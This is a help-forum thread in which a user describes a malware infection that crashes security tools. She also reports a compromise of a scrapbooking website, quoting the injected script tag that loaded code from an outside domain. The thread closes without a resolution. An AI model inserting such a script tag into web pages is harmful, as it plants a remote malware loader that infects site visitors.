Jump to content

Not sure what malware I have, but none of the fixes work


jevans

Recommended Posts

Hi,

I've tried many of the suggestions in your forums and have yet to find a solution that works. Anti-Malware crashes a few seconds after I open it, but none of the fixes posted will work.

- I tried renaming the .exe to .com and also renaming wbam.exe to winlogon.exe, but it still crashes in both instances.

- I also uninstalled Anti-Malware and downloaded procexp.exe, renaming it to winlogon.exe and running it. I didn't find any instances of files with shields next to them.

- I've run RootRepeal and have gotten different results each time I've run it. (It always finds c:/hiberfil.sys, and sometimes finds other files in c:/docs & settings/justine/local settings/temp, but none of them are .sys files or have prefixes matching those in the "CLB Driver list". I've attached a screen shot of the latest results in case it helps.)

- Avira AntiVir Personal crashes during the installation.

- HijackThis won't install either.

- I've run Process Explorer, but haven't seen any of the files with shields next to them or av360.exe. (Screen shot attached, just in case.)

Can anyone offer any other suggestions to try?

Thanks,

Justine

root_repeal_screen_shot.bmp

process_explorer_screen_shot.bmp

Link to post
Share on other sites

While I wait for a response, I thought providing more info. might help a bit.

I manage a small website for my sister (www.itsinthebagscrapbooking.com), which was flagged by Google about a week ago as having malware on it. After looking at the uploaded files, I found a script inserted into all the HTML files between the head and body tags (<script src=http://starktourism.com/flash/mt_global.php ></script>). We contacted the hosting company, who told it came through an exploit on one of our computers through an older version of Flash or Adobe Reader. I updated those programs, re-uploaded clean versions of all files to the website, and got us unblocked by Google.

Since then, a script is back on the site, although I can no longer access is or get FTP access to check the files.

I have updated everything I can think of...Windows Svc Pack 3, IE 8, Firefox 3.5.5, Adobe Reader 9.0...and have even removed all versions of Java and reinstalled with the latest.

I've also tried one virus removal tool after the next, including trying to install one from Sophos which seemed to match what I have. (See http://news.softpedia.com/news/New-Mass-We...-125278.shtml.) The malware must be blocking me from downloading it though, because I get a page not found error when I click the link to download the software. (I get the same error when I try to go to symantec.com too.) And if you read my previous post, you'll see the other programs I've tried.

Hope this helps clarify things,

Justine

Link to post
Share on other sites

  • 4 weeks later...
  • 2 weeks later...
  • Staff

Due to the lack of feedback this topic is closed to prevent others from posting here. If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.

Other members who need assistance please start your own topic in a new thread. Thanks!

Link to post
Share on other sites

Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.